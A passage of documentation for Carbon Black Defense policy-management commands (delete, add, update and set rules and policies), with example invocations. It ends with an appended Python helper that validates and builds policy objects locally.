/updates.cdc.carbonblack.io/update"]}],"serversForOffSiteDevices":["http://updates.cdc.carbonblack.io/update"]},"apc":{"maxExeDelay":45,"riskLevel":4,"enabled":false,"maxFileSize":4},"onAccessScan":{"profile":"NORMAL"},"onDemandScan":{"profile":"NORMAL","scanCdDvd":"AUTOSCAN","scanUsb":"AUTOSCAN","schedule":{"startHour":0,"recoveryScanIfMissed":true,"days":null,"rangeHours":0}}}}

Human Readable Output
Request Success

Delete a policy


Deletes a specified policy.

Base Command

cbd-delete-policy

Input
Parameter Description
policyId Policy ID

Context Output

There is no context output for this command.

Human Readable Output
Request Success

Add a rule to a policy


Adds a specified rule to a specified policy.

Base Command

cbd-add-rule-to-policy

Input
Parameter Description
action Rule action
operation Rule operation
required Rule required
id Rule ID
type Application type
value Application value
policyId Policy ID

Context Output

There is no context output for this command.

Command Example

!cbd-add-rule-to-policy action="TERMINATE" id="7777" operation="RANSOM" required="false" type="REPUTATION" policyId="21355" value="COMPANY_BLACK_LIST"

Human Readable Output
Request Success

Delete a rule from a policy


Deletes a specified rule from a specified policy.

Base Command

cbd-delete-rule-from-policy

Input
Parameter Description
policyId ID of the policy to delete the rule from
ruleId ID of the rule to delete

Context Output

There is no context output for this command.

Command Example

!cbd-delete-rule-from-policy ruleId=2 policyId=21355

Human Readable Output
Request Success

Update a rule in a policy


Updates a rule in a specified policy.

Base Command

cbd-update-rule-in-policy

Input
Parameter Description
action Rule action
operation Rule operation
required Rule required
id Rule ID
type Application type
value Application value
policyId Policy ID

Context Output

There is no context output for this command.

Command Example

!cbd-update-rule-in-policy action="TERMINATE" id=1 operation=RANSOM policyId=21355 required=false type=REPUTATION value=COMPANY_BLACK_LIST

Human Readable Output
Request Success

Set a policy


Sets a specified policy.

Base Command

cbd-set-policy

Input
Parameter Description
keyValue

A JSON object of key-value pairs, where each key is the field path in the policy object to update and each value is the value to set at that path.

policy

The policy to set.

Context Output

There is no context output for this command.
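The get-policy, set-policy, create/update-policy procedure described for cbd-create-policy and cbd-update-policy, together with the field-path semantics of cbd-set-policy's keyValue input, as an added Python example. This is not code from the integration or from Carbon Black's API: the helper names are hypothetical, the sample policy is constructed from the cbd-get-policy context example above, and the dotted-path syntax ("avSettings.apc.enabled", "sensorSettings.3.value") is an assumption, since the page does not spell out how a field path is written. The helper refuses paths that do not already exist and rejects rule entries missing the keys the page's examples carry, so a typo cannot silently produce a policy with a dead rule.

```python
# Added example, not the integration's own code: build a policy object for
# cbd-create-policy / cbd-update-policy from one fetched with cbd-get-policy,
# applying dotted field-path overrides as cbd-set-policy's keyValue input describes.
# Assumption (not on the page): a path is dotted keys with integer list indices,
# e.g. "avSettings.apc.enabled" or "sensorSettings.3.value"; helper names are mine.
import copy
import json
from typing import Any, Dict, List

# Constructed sample, trimmed from the cbd-get-policy context example on the page.
SAMPLE_POLICY: Dict[str, Any] = {
    "id": -1,
    "rules": [],
    "directoryActionRules": [],
    "sensorSettings": [
        {"name": "ALLOW_UNINSTALL", "value": "true"},
        {"name": "ALLOW_UPLOADS", "value": "false"},
        {"name": "SHOW_UI", "value": "false"},
        {"name": "QUARANTINE_DEVICE", "value": "false"},
    ],
    "avSettings": {
        "apc": {"enabled": False, "maxExeDelay": 45, "maxFileSize": 4, "riskLevel": 4},
        "features": [
            {"enabled": False, "name": "SIGNATURE_UPDATE"},
            {"enabled": False, "name": "ONACCESS_SCAN"},
            {"enabled": True, "name": "ONDEMAND_SCAN"},
        ],
        "onAccessScan": {"profile": "NORMAL"},
    },
}

# Keys every entry of "rules" carries in the page's cbd-create-policy example.
RULE_KEYS = {"action", "application", "id", "operation", "required"}


def set_policy_fields(policy: Dict[str, Any], key_values: Dict[str, Any]) -> Dict[str, Any]:
    """Deep-copy `policy` and set each dotted field path to its value. Paths must
    already exist: a typo raises KeyError instead of silently adding a field."""
    updated = copy.deepcopy(policy)
    for path, value in key_values.items():
        parts = path.split(".")
        node: Any = updated
        try:
            for part in parts[:-1]:
                node = node[int(part)] if isinstance(node, list) else node[part]
            last = parts[-1]
            if isinstance(node, list):
                node[int(last)] = value
            elif last in node:
                node[last] = value
            else:
                raise KeyError(last)
        except (KeyError, IndexError, ValueError, TypeError) as exc:
            raise KeyError(f"no such field path {path!r} in policy") from exc
    return updated


def set_sensor_setting(policy: Dict[str, Any], name: str, value: str) -> Dict[str, Any]:
    """sensorSettings is a list of {name, value}: update by name, append if absent.
    Values are strings ("true", "false", "0") as in the page's JSON, not booleans."""
    updated = copy.deepcopy(policy)
    for setting in updated["sensorSettings"]:
        if setting["name"] == name:
            setting["value"] = value
            break
    else:
        updated["sensorSettings"].append({"name": name, "value": value})
    return updated


def validate_policy(policy: Dict[str, Any]) -> List[str]:
    """Return a list of problems; an empty list means the object is worth sending."""
    problems: List[str] = []
    for key in ("rules", "sensorSettings", "avSettings", "directoryActionRules"):
        if key not in policy:
            problems.append(f"missing top-level key {key!r}")
    for rule in policy.get("rules", []):
        rid = rule.get("id")
        missing = RULE_KEYS - set(rule)
        if missing:
            problems.append(f"rule {rid} missing {sorted(missing)}")
        if not {"type", "value"} <= set(rule.get("application") or {}):
            problems.append(f"rule {rid} application needs type and value")
    for setting in policy.get("sensorSettings", []):
        if not isinstance(setting.get("value"), str):
            problems.append(f"sensorSettings {setting.get('name')} value must be a string")
    return problems


def build_policy_args(name: str, description: str, priority_level: str,
                      policy: Dict[str, Any]) -> Dict[str, str]:
    """Arguments for cbd-create-policy / cbd-update-policy, with the policy as compact
    JSON (the bare object, as in the page's update example); refuses a bad object."""
    problems = validate_policy(policy)
    if problems:
        raise ValueError("; ".join(problems))
    return {"name": name, "description": description, "priorityLevel": priority_level,
            "policy": json.dumps(policy, separators=(",", ":"))}
```

Typical use is `build_policy_args("name", "description", "LOW", set_sensor_setting(set_policy_fields(base, {"avSettings.features.1.enabled": True}), "QUARANTINE_DEVICE", "true"))`, where `base` is the object taken from the cbd-get-policy context; the returned dictionary maps one-to-one onto the command's parameters. The page's own create-policy example wraps the object in a policyInfo envelope while its update-policy example passes the bare object, so check which shape your integration version expects before sending.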